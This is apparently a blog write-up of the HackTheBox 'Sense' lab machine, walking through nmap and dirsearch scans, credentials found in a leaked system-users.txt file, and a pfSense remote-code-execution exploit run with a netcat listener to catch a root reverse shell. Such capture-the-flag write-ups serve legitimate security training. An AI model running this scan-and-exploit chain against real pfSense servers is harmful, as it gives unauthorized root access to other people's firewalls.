HackTheBox – Sense Writeup

Sense is a beginner level FreeBSD machine released on 21 October 2017. The machine resides at 10.10.10.60. It has a webserver running pfsense firewall which has a remote code execution vulnerability. This vulnerability gives us direct root access into the machine.

Sense Writeup

Connecting to HTB Vpn:

1] First download the vpn file from the access page of hackthebox.eu

2] Open the .ovpn file in your terminal with the following command

openvpn yourname.ovpn

3]Now as the “Initialization Completed” message appears on the screen you are connected to the hackthebox network

4]You can access the machine at 10.10.10.60

SCANNING

1] Let’s start by performing a nmap scan our target at 10.10.10.60

nmap -sV -A -p- –script vuln 10.10.10.60

-sV : to get the service versions on each port
-A : to get information such as os details, traceroutes,ports etc
-p- : to scan all 65535 ports
–script vuln : to check for most common vulnerabilities

We get the following details from our scan

Sense Writeup

ENUMERATION

2] We can see that only two port 80 and 443 are open

3] Since port 80 is open let’s navigate to the web server using our browser

4] On the home page we can see a login page with ‘pfsense’ banner

Sense Writeup

 

5] Lets research more about pfsense using google. During my research I came to know that the default credentials for pfsense are admin:pfsense

6] But i tried those credentials and it did not log in. I also found out that pfsense has a remote command execution exploit which will give a shell but we need the credentials for the exploit to work

7] Since we are stuck here, let’s run a directory scan on the web server and check if there are any hidden directories or files .

I am using a tool called dirsearch and the dirbuster medium wordlist. You can use any directory scanner to achieve this. Dirb and Dirbuster are some of the inbuilt directory scanners in kali

python3 dirsearch.py -w
/usr/share/wordlists/directory-list-2.3-medium.txt -u 10.10.10.60 -E -i 200

-w : to specify the wordlist
-u : to specify the web server
-E : to check for most common extensions
-i : to show only results with 200 status code

Dirsearch URL : https://github.com/maurosoria/dirsearch

8] The results of the directory scanning tells us that there is file called system-users.txt, so let’s check that out using our browser

Sense Writeup

9] The file says the username is rohit and the password is the default, so it must be pfsense. With these credentials, we are able to log in to the pfsense application

10] From our research about pfsense we had found a python exploit which gives us remote code execution on the system

URL: https://www.exploit-db.com/exploits/43560

11] So let’s download this exploit and use it

GAINING ACCESS

12] To use the exploit type the following command but replace the lhost,lport,rhost values with your values

python3 43560.py –rhost=10.10.10.60 –lhost=10.10.14.20 lport=1111
–username=rohit –password=pfsense

Before running the exploit set a netcat listener to catch the reverse connection on port 1111

nc -lvp 1111

13] Now lets run the exploit

Sense Writeup

14] We can see that we got a reverse shell on our netcat listener and that too as root

whoami

Sense Writeup

Don’t forget to check out our latest Blogs – TryHackMe Tomghost-Writeup

Leave a Reply

Your email address will not be published. Required fields are marked *